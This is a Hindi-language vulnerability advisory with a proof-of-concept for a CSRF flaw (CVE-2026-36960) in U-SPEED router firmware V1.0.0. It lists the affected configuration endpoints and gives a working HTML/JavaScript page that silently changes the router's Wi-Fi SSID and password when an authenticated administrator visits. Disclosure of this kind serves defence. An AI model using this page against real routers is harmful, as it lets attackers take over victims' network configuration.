
CVE-2026-36960 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो U-SPEED राउटर फर्मवेयर में एक CSRF भेद्यता है, जो जाली अनुरोधों के माध्यम से अनधिकृत कॉन्फ़िगरेशन परिवर्तनों की अनुमति देती है।
CVE ID: CVE-2026-36960 दिनांक: 2026-04-29 खोजकर्ता: Kirubel Solomne विक्रेता: U-SPEED उत्पाद: U-SPEED राउटर फर्मवेयर संस्करण: V1.0.0 CWE: CWE-352 - क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)
U-SPEED राउटर फर्मवेयर V1.0.0 प्रशासनिक API एंडपॉइंट्स के लिए एंटी-CSRF टोकन या सख्त Origin/Referer सत्यापन जैसे CSRF सुरक्षा तंत्र लागू नहीं करता है। एक हमलावर एक दुर्भावनापूर्ण वेबपेज बना सकता है जो कॉन्फ़िगरेशन एंडपॉइंट्स पर नकली HTTP अनुरोध भेजता है। यदि कोई प्रमाणित व्यवस्थापक दुर्भावनापूर्ण वेबपेज पर जाता है, तो राउटर अनुरोध को एक वैध प्रशासनिक क्रिया के रूप में संसाधित करता है।
CVSS v3.1 स्कोर: 8.8 (उच्च)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| मीट्रिक | मान |
|---|
| आक्रमण वेक्टर | नेटवर्क |
| आक्रमण जटिलता | निम्न |
| आवश्यक विशेषाधिकार | कोई नहीं |
| उपयोगकर्ता सहभागिता | आवश्यक |
| गोपनीयता प्रभाव | उच्च |
| अखंडता प्रभाव | उच्च |
| उपलब्धता प्रभाव | उच्च |
| एंडपॉइंट | कार्य |
|---|---|
/api/setWlan | वायरलेस नेटवर्क कॉन्फ़िगरेशन |
/api/telnet | टेलनेट सेवा कॉन्फ़िगरेशन |
| अन्य कॉन्फ़िग एंडपॉइंट्स | विभिन्न प्रशासनिक कार्य |
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
अपेक्षित व्यवहार: CSRF टोकन की कमी के कारण अनुरोध को अस्वीकार किया जाना चाहिए। वास्तविक व्यवहार: राउटर नकली अनुरोध को स्वीकार करता है और संसाधित करता है।
| दिनांक | घटना |
|---|---|
| 2026-04-29 | भेद्यता की खोज की गई |
| 2026-04-29 | MITRE को रिपोर्ट किया गया |
| 2026-04-29 | CVE-2026-36960 निर्धारित किया गया |
| 2026-04-29 | सार्वजनिक प्रकटीकरण |